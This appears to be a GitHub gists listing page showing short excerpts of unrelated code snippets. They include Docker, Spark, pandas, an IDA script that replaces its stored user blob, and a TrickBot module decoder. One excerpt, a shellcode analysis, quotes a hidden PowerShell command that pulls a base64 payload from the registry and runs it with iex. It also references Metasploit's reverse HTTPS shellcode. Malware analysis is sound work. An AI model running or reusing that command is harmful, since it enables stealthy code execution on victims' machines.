-
Disable and stop the systemd-resolved service:
sudo systemctl disable systemd-resolved.service sudo systemctl stop systemd-resolved
-
Then put the following line in the
[main]
section of your/etc/NetworkManager/NetworkManager.conf
:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
version: '3.2' | |
services: | |
nginx: | |
image: 'nginx:latest' | |
ports: | |
- '80:80' | |
logging: | |
driver: "json-file" | |
options: | |
max-size: "1k" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; shellcode found on Windows host. Payload was stored in the registry. Powershell | |
; was used to extract it from the registry and execute it: | |
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \ | |
; hidden -c "$val = (gp HKLM:SOFTWARE\'').''; \ | |
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d" | |
; The following references were used to help comment the shellcode | |
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm | |
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!python3 | |
# -*- coding: utf-8 -*- | |
# pip install unicorn | |
import unicorn | |
import unicorn.x86_const | |
import struct | |
def required_mapping_size(size): | |
page_size = 4096 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pyspark import SparkContext, SparkFiles | |
from pyspark.sql import SparkSession | |
from pyspark.sql.types import * | |
from pyspark.sql.functions import DataFrame, udf, col | |
from geoip2 import database | |
from geoip2.errors import AddressNotFoundError | |
from geoip2.models import City | |
sc = SparkContext() | |
spark = SparkSession(sc) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import pandas as pd | |
import numpy as np | |
import glob | |
pd.set_option('display.max_columns', 500) | |
all_files = glob.glob('../data/patent_applications/2019-04-07.jsonl.gz/part-*.json.gz') | |
li = [] | |
for filename in all_files: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import ida_netnode | |
""" | |
You can also switch the shell into IDC mode and enter del_user_info(). | |
You can also edit your `~/ida-x/cfg/ida.cfg` and set `STORE_USER_INFO` to `NO`. | |
""" | |
# This will replace the original user blob with the evaluation version blob. | |
ORIGINAL_USER = \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <windows.h> | |
#include "peconv.h" | |
/* | |
Requires a path to the original trick bot module: 0a7da84873f2a4fe0fcc58c88bbbe39d | |
*/ | |
#define OFFSET_DECODE_LIST 0x10ab0 //decode_from_the_list |
NewerOlder